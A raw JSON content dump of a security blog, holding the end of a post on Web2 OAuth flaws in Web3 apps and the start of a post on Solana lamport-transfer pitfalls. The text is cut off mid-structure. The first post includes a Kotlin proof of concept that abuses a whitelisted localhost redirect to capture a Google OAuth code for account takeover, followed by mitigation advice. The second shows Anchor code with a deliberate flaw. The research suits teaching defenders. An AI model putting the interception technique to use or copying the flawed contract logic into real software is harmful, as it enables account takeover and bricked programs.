startWebServer",{"type":26,"tag":137,"props":73151,"children":73152},{"style":5601},[73153],{"type":32,"value":10320},{"type":26,"tag":137,"props":73155,"children":73156},{"class":5559,"line":5930},[73157,73162,73166,73170,73175,73179,73184],{"type":26,"tag":137,"props":73158,"children":73159},{"style":5601},[73160],{"type":32,"value":73161},"                Log.",{"type":26,"tag":137,"props":73163,"children":73164},{"style":5682},[73165],{"type":32,"value":3293},{"type":26,"tag":137,"props":73167,"children":73168},{"style":5601},[73169],{"type":32,"value":165},{"type":26,"tag":137,"props":73171,"children":73172},{"style":6837},[73173],{"type":32,"value":73174},"\"WebServer\"",{"type":26,"tag":137,"props":73176,"children":73177},{"style":5601},[73178],{"type":32,"value":1108},{"type":26,"tag":137,"props":73180,"children":73181},{"style":6837},[73182],{"type":32,"value":73183},"\"Server started on http://localhost:3000\"",{"type":26,"tag":137,"props":73185,"children":73186},{"style":5601},[73187],{"type":32,"value":5742},{"type":26,"tag":137,"props":73189,"children":73190},{"class":5559,"line":5939},[73191,73196,73200,73205,73210],{"type":26,"tag":137,"props":73192,"children":73193},{"style":5601},[73194],{"type":32,"value":73195},"            } ",{"type":26,"tag":137,"props":73197,"children":73198},{"style":5573},[73199],{"type":32,"value":51013},{"type":26,"tag":137,"props":73201,"children":73202},{"style":5601},[73203],{"type":32,"value":73204}," (e: ",{"type":26,"tag":137,"props":73206,"children":73207},{"style":6009},[73208],{"type":32,"value":73209},"Exception",{"type":26,"tag":137,"props":73211,"children":73212},{"style":5601},[73213],{"type":32,"value":17395},{"type":26,"tag":137,"props":73215,"children":73216},{"class":5559,"line":6191},[73217,73221,73225,73229,73233,73237,73242,73246,73251,73255,73259],{"type":26,"tag":137,"props":73218,"children":73219},{"style":5601},[73220],{"type":32,"value":73161},{"type":26,"tag":137,"props":73222,"children":73223},{"style":5682},[73224],{"type":32,"value":54057},{"type":26,"tag":137,"props":73226,"children":73227},{"style":5601},[73228],{"type":32,"value":165},{"type":26,"tag":137,"props":73230,"children":73231},{"style":6837},[73232],{"type":32,"value":73174},{"type":26,"tag":137,"props":73234,"children":73235},{"style":5601},[73236],{"type":32,"value":1108},{"type":26,"tag":137,"props":73238,"children":73239},{"style":6837},[73240],{"type":32,"value":73241},"\"Error starting server: ",{"type":26,"tag":137,"props":73243,"children":73244},{"style":5573},[73245],{"type":32,"value":36704},{"type":26,"tag":137,"props":73247,"children":73248},{"style":5590},[73249],{"type":32,"value":73250},"e.message",{"type":26,"tag":137,"props":73252,"children":73253},{"style":5573},[73254],{"type":32,"value":36736},{"type":26,"tag":137,"props":73256,"children":73257},{"style":6837},[73258],{"type":32,"value":22653},{"type":26,"tag":137,"props":73260,"children":73261},{"style":5601},[73262],{"type":32,"value":73263},", e)\n",{"type":26,"tag":137,"props":73265,"children":73266},{"class":5559,"line":6208},[73267],{"type":26,"tag":137,"props":73268,"children":73269},{"style":5601},[73270],{"type":32,"value":61486},{"type":26,"tag":137,"props":73272,"children":73273},{"class":5559,"line":6225},[73274],{"type":26,"tag":137,"props":73275,"children":73276},{"style":5601},[73277],{"type":32,"value":5936},{"type":26,"tag":137,"props":73279,"children":73280},{"class":5559,"line":6238},[73281],{"type":26,"tag":137,"props":73282,"children":73283},{"emptyLinePlaceholder":18},[73284],{"type":32,"value":6276},{"type":26,"tag":137,"props":73286,"children":73287},{"class":5559,"line":6247},[73288],{"type":26,"tag":137,"props":73289,"children":73290},{"style":5564},[73291],{"type":32,"value":73292},"        // Open the Google OAuth page\n",{"type":26,"tag":137,"props":73294,"children":73295},{"class":5559,"line":6270},[73296,73301,73306,73310],{"type":26,"tag":137,"props":73297,"children":73298},{"style":5573},[73299],{"type":32,"value":73300},"        val",{"type":26,"tag":137,"props":73302,"children":73303},{"style":5601},[73304],{"type":32,"value":73305}," googleOAuthUrl ",{"type":26,"tag":137,"props":73307,"children":73308},{"style":5590},[73309],{"type":32,"value":289},{"type":26,"tag":137,"props":73311,"children":73312},{"style":6837},[73313],{"type":32,"value":73314}," \"https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\"\n",{"type":26,"tag":137,"props":73316,"children":73317},{"class":5559,"line":6279},[73318,73322,73327,73331,73336,73341,73345],{"type":26,"tag":137,"props":73319,"children":73320},{"style":5573},[73321],{"type":32,"value":73300},{"type":26,"tag":137,"props":73323,"children":73324},{"style":5601},[73325],{"type":32,"value":73326}," browserIntent ",{"type":26,"tag":137,"props":73328,"children":73329},{"style":5590},[73330],{"type":32,"value":289},{"type":26,"tag":137,"props":73332,"children":73333},{"style":5682},[73334],{"type":32,"value":73335}," Intent",{"type":26,"tag":137,"props":73337,"children":73338},{"style":5601},[73339],{"type":32,"value":73340},"(Intent.ACTION_VIEW, Uri.",{"type":26,"tag":137,"props":73342,"children":73343},{"style":5682},[73344],{"type":32,"value":41808},{"type":26,"tag":137,"props":73346,"children":73347},{"style":5601},[73348],{"type":32,"value":73349},"(googleOAuthUrl))\n",{"type":26,"tag":137,"props":73351,"children":73352},{"class":5559,"line":6288},[73353,73358],{"type":26,"tag":137,"props":73354,"children":73355},{"style":5682},[73356],{"type":32,"value":73357},"        startActivity",{"type":26,"tag":137,"props":73359,"children":73360},{"style":5601},[73361],{"type":32,"value":73362},"(browserIntent)\n",{"type":26,"tag":137,"props":73364,"children":73365},{"class":5559,"line":6355},[73366],{"type":26,"tag":137,"props":73367,"children":73368},{"style":5601},[73369],{"type":32,"value":5945},{"type":26,"tag":137,"props":73371,"children":73372},{"class":5559,"line":6363},[73373],{"type":26,"tag":137,"props":73374,"children":73375},{"emptyLinePlaceholder":18},[73376],{"type":32,"value":6276},{"type":26,"tag":137,"props":73378,"children":73379},{"class":5559,"line":6393},[73380,73385,73389,73394],{"type":26,"tag":137,"props":73381,"children":73382},{"style":5573},[73383],{"type":32,"value":73384},"    private",{"type":26,"tag":137,"props":73386,"children":73387},{"style":5573},[73388],{"type":32,"value":8792},{"type":26,"tag":137,"props":73390,"children":73391},{"style":5682},[73392],{"type":32,"value":73393}," startWebServer",{"type":26,"tag":137,"props":73395,"children":73396},{"style":5601},[73397],{"type":32,"value":18328},{"type":26,"tag":137,"props":73399,"children":73400},{"class":5559,"line":6401},[73401,73406,73411,73415,73420],{"type":26,"tag":137,"props":73402,"children":73403},{"style":5682},[73404],{"type":32,"value":73405},"        embeddedServer",{"type":26,"tag":137,"props":73407,"children":73408},{"style":5601},[73409],{"type":32,"value":73410},"(CIO, port ",{"type":26,"tag":137,"props":73412,"children":73413},{"style":5590},[73414],{"type":32,"value":289},{"type":26,"tag":137,"props":73416,"children":73417},{"style":5626},[73418],{"type":32,"value":73419}," 3000",{"type":26,"tag":137,"props":73421,"children":73422},{"style":5601},[73423],{"type":32,"value":17395},{"type":26,"tag":137,"props":73425,"children":73426},{"class":5559,"line":6433},[73427,73432],{"type":26,"tag":137,"props":73428,"children":73429},{"style":5682},[73430],{"type":32,"value":73431},"            routing",{"type":26,"tag":137,"props":73433,"children":73434},{"style":5601},[73435],{"type":32,"value":5875},{"type":26,"tag":137,"props":73437,"children":73438},{"class":5559,"line":6441},[73439,73444,73448,73453],{"type":26,"tag":137,"props":73440,"children":73441},{"style":5573},[73442],{"type":32,"value":73443},"                get",{"type":26,"tag":137,"props":73445,"children":73446},{"style":5601},[73447],{"type":32,"value":165},{"type":26,"tag":137,"props":73449,"children":73450},{"style":6837},[73451],{"type":32,"value":73452},"\"{...}\"",{"type":26,"tag":137,"props":73454,"children":73455},{"style":5601},[73456],{"type":32,"value":17395},{"type":26,"tag":137,"props":73458,"children":73459},{"class":5559,"line":6501},[73460,73465,73470],{"type":26,"tag":137,"props":73461,"children":73462},{"style":5601},[73463],{"type":32,"value":73464},"                    call.",{"type":26,"tag":137,"props":73466,"children":73467},{"style":5682},[73468],{"type":32,"value":73469},"respondHtml",{"type":26,"tag":137,"props":73471,"children":73472},{"style":5601},[73473],{"type":32,"value":5875},{"type":26,"tag":137,"props":73475,"children":73476},{"class":5559,"line":11634},[73477,73482],{"type":26,"tag":137,"props":73478,"children":73479},{"style":5682},[73480],{"type":32,"value":73481},"                        head",{"type":26,"tag":137,"props":73483,"children":73484},{"style":5601},[73485],{"type":32,"value":5875},{"type":26,"tag":137,"props":73487,"children":73488},{"class":5559,"line":11652},[73489,73494,73499,73503,73508],{"type":26,"tag":137,"props":73490,"children":73491},{"style":5682},[73492],{"type":32,"value":73493},"                            meta",{"type":26,"tag":137,"props":73495,"children":73496},{"style":5601},[73497],{"type":32,"value":73498},"(charset ",{"type":26,"tag":137,"props":73500,"children":73501},{"style":5590},[73502],{"type":32,"value":289},{"type":26,"tag":137,"props":73504,"children":73505},{"style":6837},[73506],{"type":32,"value":73507}," \"UTF-8\"",{"type":26,"tag":137,"props":73509,"children":73510},{"style":5601},[73511],{"type":32,"value":5742},{"type":26,"tag":137,"props":73513,"children":73514},{"class":5559,"line":11697},[73515,73519,73524,73528,73533,73538,73542,73547],{"type":26,"tag":137,"props":73516,"children":73517},{"style":5682},[73518],{"type":32,"value":73493},{"type":26,"tag":137,"props":73520,"children":73521},{"style":5601},[73522],{"type":32,"value":73523},"(name ",{"type":26,"tag":137,"props":73525,"children":73526},{"style":5590},[73527],{"type":32,"value":289},{"type":26,"tag":137,"props":73529,"children":73530},{"style":6837},[73531],{"type":32,"value":73532}," \"viewport\"",{"type":26,"tag":137,"props":73534,"children":73535},{"style":5601},[73536],{"type":32,"value":73537},", content ",{"type":26,"tag":137,"props":73539,"children":73540},{"style":5590},[73541],{"type":32,"value":289},{"type":26,"tag":137,"props":73543,"children":73544},{"style":6837},[73545],{"type":32,"value":73546}," \"width=device-width, initial-scale=1.0\"",{"type":26,"tag":137,"props":73548,"children":73549},{"style":5601},[73550],{"type":32,"value":5742},{"type":26,"tag":137,"props":73552,"children":73553},{"class":5559,"line":11803},[73554,73559,73563,73568],{"type":26,"tag":137,"props":73555,"children":73556},{"style":5682},[73557],{"type":32,"value":73558},"                            title",{"type":26,"tag":137,"props":73560,"children":73561},{"style":5601},[73562],{"type":32,"value":165},{"type":26,"tag":137,"props":73564,"children":73565},{"style":6837},[73566],{"type":32,"value":73567},"\"OAuth Redirect\"",{"type":26,"tag":137,"props":73569,"children":73570},{"style":5601},[73571],{"type":32,"value":5742},{"type":26,"tag":137,"props":73573,"children":73574},{"class":5559,"line":26089},[73575],{"type":26,"tag":137,"props":73576,"children":73577},{"style":5601},[73578],{"type":32,"value":73579},"                        }\n",{"type":26,"tag":137,"props":73581,"children":73582},{"class":5559,"line":26124},[73583,73588],{"type":26,"tag":137,"props":73584,"children":73585},{"style":5682},[73586],{"type":32,"value":73587},"                        body",{"type":26,"tag":137,"props":73589,"children":73590},{"style":5601},[73591],{"type":32,"value":5875},{"type":26,"tag":137,"props":73593,"children":73594},{"class":5559,"line":26132},[73595,73600,73604,73608,73613],{"type":26,"tag":137,"props":73596,"children":73597},{"style":5682},[73598],{"type":32,"value":73599},"                            h1",{"type":26,"tag":137,"props":73601,"children":73602},{"style":5601},[73603],{"type":32,"value":12175},{"type":26,"tag":137,"props":73605,"children":73606},{"style":5590},[73607],{"type":32,"value":356},{"type":26,"tag":137,"props":73609,"children":73610},{"style":6837},[73611],{"type":32,"value":73612},"\"Google OAuth Redirect\"",{"type":26,"tag":137,"props":73614,"children":73615},{"style":5601},[73616],{"type":32,"value":12185},{"type":26,"tag":137,"props":73618,"children":73619},{"class":5559,"line":26140},[73620,73625],{"type":26,"tag":137,"props":73621,"children":73622},{"style":5682},[73623],{"type":32,"value":73624},"                            script",{"type":26,"tag":137,"props":73626,"children":73627},{"style":5601},[73628],{"type":32,"value":5875},{"type":26,"tag":137,"props":73630,"children":73631},{"class":5559,"line":26149},[73632,73637],{"type":26,"tag":137,"props":73633,"children":73634},{"style":5590},[73635],{"type":32,"value":73636},"                                +",{"type":26,"tag":137,"props":73638,"children":73639},{"style":6837},[73640],{"type":32,"value":73641},"\"document.body.innerText = location.search;\"\n",{"type":26,"tag":137,"props":73643,"children":73644},{"class":5559,"line":26191},[73645],{"type":26,"tag":137,"props":73646,"children":73647},{"style":5601},[73648],{"type":32,"value":73649},"                            }\n",{"type":26,"tag":137,"props":73651,"children":73652},{"class":5559,"line":26224},[73653],{"type":26,"tag":137,"props":73654,"children":73655},{"style":5601},[73656],{"type":32,"value":73579},{"type":26,"tag":137,"props":73658,"children":73659},{"class":5559,"line":26232},[73660],{"type":26,"tag":137,"props":73661,"children":73662},{"style":5601},[73663],{"type":32,"value":73664},"                    }\n",{"type":26,"tag":137,"props":73666,"children":73667},{"class":5559,"line":26240},[73668],{"type":26,"tag":137,"props":73669,"children":73670},{"style":5601},[73671],{"type":32,"value":73672},"                }\n",{"type":26,"tag":137,"props":73674,"children":73675},{"class":5559,"line":26249},[73676],{"type":26,"tag":137,"props":73677,"children":73678},{"style":5601},[73679],{"type":32,"value":61486},{"type":26,"tag":137,"props":73681,"children":73682},{"class":5559,"line":26325},[73683,73688,73693,73698,73702,73706],{"type":26,"tag":137,"props":73684,"children":73685},{"style":5601},[73686],{"type":32,"value":73687},"        }.",{"type":26,"tag":137,"props":73689,"children":73690},{"style":5682},[73691],{"type":32,"value":73692},"start",{"type":26,"tag":137,"props":73694,"children":73695},{"style":5601},[73696],{"type":32,"value":73697},"(wait ",{"type":26,"tag":137,"props":73699,"children":73700},{"style":5590},[73701],{"type":32,"value":289},{"type":26,"tag":137,"props":73703,"children":73704},{"style":5573},[73705],{"type":32,"value":15060},{"type":26,"tag":137,"props":73707,"children":73708},{"style":5601},[73709],{"type":32,"value":5742},{"type":26,"tag":137,"props":73711,"children":73712},{"class":5559,"line":26358},[73713],{"type":26,"tag":137,"props":73714,"children":73715},{"style":5601},[73716],{"type":32,"value":5945},{"type":26,"tag":137,"props":73718,"children":73719},{"class":5559,"line":26366},[73720],{"type":26,"tag":137,"props":73721,"children":73722},{"style":5601},[73723],{"type":32,"value":6507},{"type":26,"tag":35,"props":73725,"children":73726},{},[73727],{"type":32,"value":73728},"The code essentially creates a localhost web server and redirects the user to the OAuth authorization screen, which can be automatically bypassed under certain conditionswithout any user interaction. Once the authorization process is completed, the OAuth flow redirects the user back to the localhost server, including the secret authorization token in the query string.",{"type":26,"tag":35,"props":73730,"children":73731},{},[73732],{"type":32,"value":73733},"Since the attacker controls the localhost server, they can intercept and extract the token, enabling them to take over the victim's account.",{"type":26,"tag":118,"props":73735,"children":73737},{"id":73736},"mitigation-1",[73738],{"type":32,"value":42933},{"type":26,"tag":35,"props":73740,"children":73741},{},[73742,73744,73749],{"type":32,"value":73743},"As a mitigation measure, it is crucial to ensure that localhost servers are not whitelisted in the OAuth ",{"type":26,"tag":130,"props":73745,"children":73747},{"className":73746},[],[73748],{"type":32,"value":72367},{"type":32,"value":73750}," parameter. If whitelisting localhost is necessary due to specific business requirements, a custom solution must be carefully designed and implemented to safeguard the account security of all users.",{"type":26,"tag":92,"props":73752,"children":73753},{"id":31526},[73754],{"type":32,"value":21540},{"type":26,"tag":35,"props":73756,"children":73757},{},[73758],{"type":32,"value":73759},"In this article, we explored three lesser-known classes of vulnerabilities present in Web2 authentication flows utilized by Web3 dApps, shedding light on critical but often overlooked security risks. Authentication processes are inherently complex, and this complexity leaves room for vulnerabilities to persist unnoticed in applications.",{"type":26,"tag":35,"props":73761,"children":73762},{},[73763],{"type":32,"value":73764},"By uncovering and analyzing these vulnerabilities, we aim to stress the necessity of adopting a robust, holistic approach to authentication security. As Web3 continues to evolve, bridging the gap between traditional Web2 frameworks and the decentralized Web3 ecosystem is not just an opportunity but an imperative to safeguard users and their data.",{"type":26,"tag":7949,"props":73766,"children":73767},{},[73768],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":73770},[73771,73778,73783,73786],{"id":72135,"depth":5412,"text":72138,"children":73772},[73773,73774,73775,73776,73777],{"id":72146,"depth":5417,"text":72149},{"id":72173,"depth":5417,"text":72176},{"id":72234,"depth":5417,"text":72237},{"id":72291,"depth":5417,"text":72294},{"id":72390,"depth":5417,"text":72393},{"id":72436,"depth":5412,"text":72439,"children":73779},[73780,73781,73782],{"id":72442,"depth":5417,"text":72445},{"id":72469,"depth":5417,"text":72472},{"id":42930,"depth":5417,"text":42933},{"id":72918,"depth":5412,"text":72921,"children":73784},[73785],{"id":73736,"depth":5417,"text":42933},{"id":31526,"depth":5412,"text":21540},"content:blog:2025-03-07-subverting-web2-authentication-in-web3.md","blog/2025-03-07-subverting-web2-authentication-in-web3.md","blog/2025-03-07-subverting-web2-authentication-in-web3",{"_path":73791,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":73792,"description":73793,"author":43049,"image":73794,"date":73796,"isFeatured":18,"tags":73797,"onBlogPage":18,"body":73798,"_type":5433,"_id":78452,"_source":5435,"_file":78453,"_stem":78454,"_extension":5438},"/blog/2025-05-14-king-of-the-sol","Solana: The hidden dangers of lamport transfers","Solana’s lamport transfer logic hides dangerous edge cases — from rent-exemption quirks to write-demotion traps. We dissect a deceptively simple smart contract game to expose how transfers to arbitrary accounts can silently fail, brick your program, or crown an eternal king.",{"src":73795,"height":17,"width":17},"/posts/king-of-the-sol/king-of-the-sol.png","2025-05-14",[5450],{"type":23,"children":73799,"toc":78441},[73800,73804,73809,73823,73829,73834,73864,73869,73874,74912,74917,74925,74930,74936,74942,74954,74987,74999,75012,75024,75469,75474,75520,75526,75531,75618,75623,75637,75650,76313,76318,76330,76336,76347,76359,76513,76527,76546,76567,76573,76578,76923,76928,76934,76953,76967,77589,77594,77614,77619,77624,77630,77642,77663,77838,77844,77849,78150,78171,78183,78195,78279,78299,78311,78317,78329,78335,78340,78363,78375,78381,78393,78398,78404,78409,78414,78432,78437],{"type":26,"tag":92,"props":73801,"children":73802},{"id":31609},[73803],{"type":32,"value":31612},{"type":26,"tag":35,"props":73805,"children":73806},{},[73807],{"type":32,"value":73808},"Is it safe to transfer lamports to an arbitrary address on Solana? The answer might surprise you.",{"type":26,"tag":35,"props":73810,"children":73811},{},[73812,73814,73821],{"type":32,"value":73813},"In this post, we explore a deceptively simple smart contract game inspired by ",{"type":26,"tag":41,"props":73815,"children":73818},{"href":73816,"rel":73817},"https://www.kingoftheether.com/thrones/kingoftheether/index.html",[45],[73819],{"type":32,"value":73820},"King of the Ether",{"type":32,"value":73822},". Through it, we’ll highlight subtle pitfalls in Solana’s account model that can brick your program — especially when it comes to transferring lamports.",{"type":26,"tag":92,"props":73824,"children":73826},{"id":73825},"the-game-king-of-the-sol",[73827],{"type":32,"value":73828},"The Game: King of the SOL",{"type":26,"tag":35,"props":73830,"children":73831},{},[73832],{"type":32,"value":73833},"The game works like this:",{"type":26,"tag":3426,"props":73835,"children":73836},{},[73837,73849,73854,73859],{"type":26,"tag":3430,"props":73838,"children":73839},{},[73840,73842,73847],{"type":32,"value":73841},"Anyone can become the ",{"type":26,"tag":84,"props":73843,"children":73844},{},[73845],{"type":32,"value":73846},"king",{"type":32,"value":73848}," by bidding at least 2× the previous bid.",{"type":26,"tag":3430,"props":73850,"children":73851},{},[73852],{"type":32,"value":73853},"The old king is reimbursed 95% of their bid.",{"type":26,"tag":3430,"props":73855,"children":73856},{},[73857],{"type":32,"value":73858},"The remaining 5% goes into a prize pot.",{"type":26,"tag":3430,"props":73860,"children":73861},{},[73862],{"type":32,"value":73863},"If the reigning king survives for 10 days without being dethroned, they can claim the entire pot.",{"type":26,"tag":35,"props":73865,"children":73866},{},[73867],{"type":32,"value":73868},"Simple, right?",{"type":26,"tag":35,"props":73870,"children":73871},{},[73872],{"type":32,"value":73873},"This is the core logic:",{"type":26,"tag":5512,"props":73875,"children":73877},{"className":5552,"code":73876,"language":5551,"meta":7,"style":7},"#[derive(Accounts)]\npub struct ChangeKing\u003C'info> {\n    #[account(mut)]\n    pub throne: Account\u003C'info, Throne>,\n\n    /// CHECK: old_king gets a 95% refund, so ensure its writable.\n    #[account(mut, constraint = old_king.key() == throne.king)]\n    pub old_king: AccountInfo\u003C'info>,\n\n    /// CHECK: any writable account is allowed as a new king.\n    #[account(mut)]\n    pub new_king: AccountInfo\u003C'info>,\n\n    #[account(mut)]\n    pub payer: Signer\u003C'info>,\n}\n\n#[program]\npub mod king_of_the_sol {\n    pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n        // Check that bid_amount is at least 2x last_bid_amount\n        assert!(bid_amount >= ctx.accounts.throne.last_bid_amount * 2);\n        transfer_from_signer(\n            &ctx.accounts.payer,\n            &ctx.accounts.throne.to_account_info(),\n            bid_amount,\n        )?;\n\n        // Reimburse 95% of the last bid to the old king\n        let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n        transfer_from_pda(\n            &ctx.accounts.throne.to_account_info(),\n            &ctx.accounts.old_king,\n            to_reimburse,\n        )?;\n\n        // Set new king\n        ctx.accounts.throne.king = ctx.accounts.new_king.key();\n        ctx.accounts.throne.last_bid_amount = bid_amount;\n        ctx.accounts.throne.last_time = Clock::get()?.unix_timestamp as u64;\n\n        Ok(())\n    }\n}\n",[73878],{"type":26,"tag":130,"props":73879,"children":73880},{"__ignoreMap":7},[73881,73896,73924,73939,73980,73987,73995,74046,74077,74084,74092,74107,74139,74146,74161,74192,74199,74206,74214,74231,74305,74313,74374,74386,74414,74454,74466,74482,74489,74497,74571,74583,74622,74650,74662,74677,74684,74692,74762,74806,74880,74887,74898,74905],{"type":26,"tag":137,"props":73882,"children":73883},{"class":5559,"line":5560},[73884,73888,73892],{"type":26,"tag":137,"props":73885,"children":73886},{"style":5601},[73887],{"type":32,"value":25417},{"type":26,"tag":137,"props":73889,"children":73890},{"style":6009},[73891],{"type":32,"value":25422},{"type":26,"tag":137,"props":73893,"children":73894},{"style":5601},[73895],{"type":32,"value":22852},{"type":26,"tag":137,"props":73897,"children":73898},{"class":5559,"line":5412},[73899,73903,73907,73912,73916,73920],{"type":26,"tag":137,"props":73900,"children":73901},{"style":5573},[73902],{"type":32,"value":16281},{"type":26,"tag":137,"props":73904,"children":73905},{"style":5573},[73906],{"type":32,"value":23744},{"type":26,"tag":137,"props":73908,"children":73909},{"style":6009},[73910],{"type":32,"value":73911}," ChangeKing",{"type":26,"tag":137,"props":73913,"children":73914},{"style":5601},[73915],{"type":32,"value":25502},{"type":26,"tag":137,"props":73917,"children":73918},{"style":6009},[73919],{"type":32,"value":25507},{"type":26,"tag":137,"props":73921,"children":73922},{"style":5601},[73923],{"type":32,"value":9865},{"type":26,"tag":137,"props":73925,"children":73926},{"class":5559,"line":5417},[73927,73931,73935],{"type":26,"tag":137,"props":73928,"children":73929},{"style":5601},[73930],{"type":32,"value":25709},{"type":26,"tag":137,"props":73932,"children":73933},{"style":5573},[73934],{"type":32,"value":6325},{"type":26,"tag":137,"props":73936,"children":73937},{"style":5601},[73938],{"type":32,"value":22852},{"type":26,"tag":137,"props":73940,"children":73941},{"class":5559,"line":5642},[73942,73946,73951,73955,73959,73963,73967,73971,73976],{"type":26,"tag":137,"props":73943,"children":73944},{"style":5573},[73945],{"type":32,"value":23436},{"type":26,"tag":137,"props":73947,"children":73948},{"style":5584},[73949],{"type":32,"value":73950}," throne",{"type":26,"tag":137,"props":73952,"children":73953},{"style":5590},[73954],{"type":32,"value":7072},{"type":26,"tag":137,"props":73956,"children":73957},{"style":6009},[73958],{"type":32,"value":25674},{"type":26,"tag":137,"props":73960,"children":73961},{"style":5601},[73962],{"type":32,"value":25502},{"type":26,"tag":137,"props":73964,"children":73965},{"style":6009},[73966],{"type":32,"value":25507},{"type":26,"tag":137,"props":73968,"children":73969},{"style":5601},[73970],{"type":32,"value":1108},{"type":26,"tag":137,"props":73972,"children":73973},{"style":6009},[73974],{"type":32,"value":73975},"Throne",{"type":26,"tag":137,"props":73977,"children":73978},{"style":5601},[73979],{"type":32,"value":8723},{"type":26,"tag":137,"props":73981,"children":73982},{"class":5559,"line":5745},[73983],{"type":26,"tag":137,"props":73984,"children":73985},{"emptyLinePlaceholder":18},[73986],{"type":32,"value":6276},{"type":26,"tag":137,"props":73988,"children":73989},{"class":5559,"line":5850},[73990],{"type":26,"tag":137,"props":73991,"children":73992},{"style":5564},[73993],{"type":32,"value":73994},"    /// CHECK: old_king gets a 95% refund, so ensure its writable.\n",{"type":26,"tag":137,"props":73996,"children":73997},{"class":5559,"line":5878},[73998,74002,74006,74011,74015,74020,74024,74029,74033,74037,74041],{"type":26,"tag":137,"props":73999,"children":74000},{"style":5601},[74001],{"type":32,"value":25709},{"type":26,"tag":137,"props":74003,"children":74004},{"style":5573},[74005],{"type":32,"value":6325},{"type":26,"tag":137,"props":74007,"children":74008},{"style":5601},[74009],{"type":32,"value":74010},", constraint ",{"type":26,"tag":137,"props":74012,"children":74013},{"style":5590},[74014],{"type":32,"value":289},{"type":26,"tag":137,"props":74016,"children":74017},{"style":5601},[74018],{"type":32,"value":74019}," old_king",{"type":26,"tag":137,"props":74021,"children":74022},{"style":5590},[74023],{"type":32,"value":470},{"type":26,"tag":137,"props":74025,"children":74026},{"style":5601},[74027],{"type":32,"value":74028},"key() ",{"type":26,"tag":137,"props":74030,"children":74031},{"style":5590},[74032],{"type":32,"value":11161},{"type":26,"tag":137,"props":74034,"children":74035},{"style":5601},[74036],{"type":32,"value":73950},{"type":26,"tag":137,"props":74038,"children":74039},{"style":5590},[74040],{"type":32,"value":470},{"type":26,"tag":137,"props":74042,"children":74043},{"style":5601},[74044],{"type":32,"value":74045},"king)]\n",{"type":26,"tag":137,"props":74047,"children":74048},{"class":5559,"line":5891},[74049,74053,74057,74061,74065,74069,74073],{"type":26,"tag":137,"props":74050,"children":74051},{"style":5573},[74052],{"type":32,"value":23436},{"type":26,"tag":137,"props":74054,"children":74055},{"style":5584},[74056],{"type":32,"value":74019},{"type":26,"tag":137,"props":74058,"children":74059},{"style":5590},[74060],{"type":32,"value":7072},{"type":26,"tag":137,"props":74062,"children":74063},{"style":6009},[74064],{"type":32,"value":27990},{"type":26,"tag":137,"props":74066,"children":74067},{"style":5601},[74068],{"type":32,"value":25502},{"type":26,"tag":137,"props":74070,"children":74071},{"style":6009},[74072],{"type":32,"value":25507},{"type":26,"tag":137,"props":74074,"children":74075},{"style":5601},[74076],{"type":32,"value":8723},{"type":26,"tag":137,"props":74078,"children":74079},{"class":5559,"line":5909},[74080],{"type":26,"tag":137,"props":74081,"children":74082},{"emptyLinePlaceholder":18},[74083],{"type":32,"value":6276},{"type":26,"tag":137,"props":74085,"children":74086},{"class":5559,"line":5930},[74087],{"type":26,"tag":137,"props":74088,"children":74089},{"style":5564},[74090],{"type":32,"value":74091},"    /// CHECK: any writable account is allowed as a new king.\n",{"type":26,"tag":137,"props":74093,"children":74094},{"class":5559,"line":5939},[74095,74099,74103],{"type":26,"tag":137,"props":74096,"children":74097},{"style":5601},[74098],{"type":32,"value":25709},{"type":26,"tag":137,"props":74100,"children":74101},{"style":5573},[74102],{"type":32,"value":6325},{"type":26,"tag":137,"props":74104,"children":74105},{"style":5601},[74106],{"type":32,"value":22852},{"type":26,"tag":137,"props":74108,"children":74109},{"class":5559,"line":6191},[74110,74114,74119,74123,74127,74131,74135],{"type":26,"tag":137,"props":74111,"children":74112},{"style":5573},[74113],{"type":32,"value":23436},{"type":26,"tag":137,"props":74115,"children":74116},{"style":5584},[74117],{"type":32,"value":74118}," new_king",{"type":26,"tag":137,"props":74120,"children":74121},{"style":5590},[74122],{"type":32,"value":7072},{"type":26,"tag":137,"props":74124,"children":74125},{"style":6009},[74126],{"type":32,"value":27990},{"type":26,"tag":137,"props":74128,"children":74129},{"style":5601},[74130],{"type":32,"value":25502},{"type":26,"tag":137,"props":74132,"children":74133},{"style":6009},[74134],{"type":32,"value":25507},{"type":26,"tag":137,"props":74136,"children":74137},{"style":5601},[74138],{"type":32,"value":8723},{"type":26,"tag":137,"props":74140,"children":74141},{"class":5559,"line":6208},[74142],{"type":26,"tag":137,"props":74143,"children":74144},{"emptyLinePlaceholder":18},[74145],{"type":32,"value":6276},{"type":26,"tag":137,"props":74147,"children":74148},{"class":5559,"line":6225},[74149,74153,74157],{"type":26,"tag":137,"props":74150,"children":74151},{"style":5601},[74152],{"type":32,"value":25709},{"type":26,"tag":137,"props":74154,"children":74155},{"style":5573},[74156],{"type":32,"value":6325},{"type":26,"tag":137,"props":74158,"children":74159},{"style":5601},[74160],{"type":32,"value":22852},{"type":26,"tag":137,"props":74162,"children":74163},{"class":5559,"line":6238},[74164,74168,74172,74176,74180,74184,74188],{"type":26,"tag":137,"props":74165,"children":74166},{"style":5573},[74167],{"type":32,"value":23436},{"type":26,"tag":137,"props":74169,"children":74170},{"style":5584},[74171],{"type":32,"value":44839},{"type":26,"tag":137,"props":74173,"children":74174},{"style":5590},[74175],{"type":32,"value":7072},{"type":26,"tag":137,"props":74177,"children":74178},{"style":6009},[74179],{"type":32,"value":25738},{"type":26,"tag":137,"props":74181,"children":74182},{"style":5601},[74183],{"type":32,"value":25502},{"type":26,"tag":137,"props":74185,"children":74186},{"style":6009},[74187],{"type":32,"value":25507},{"type":26,"tag":137,"props":74189,"children":74190},{"style":5601},[74191],{"type":32,"value":8723},{"type":26,"tag":137,"props":74193,"children":74194},{"class":5559,"line":6247},[74195],{"type":26,"tag":137,"props":74196,"children":74197},{"style":5601},[74198],{"type":32,"value":6507},{"type":26,"tag":137,"props":7420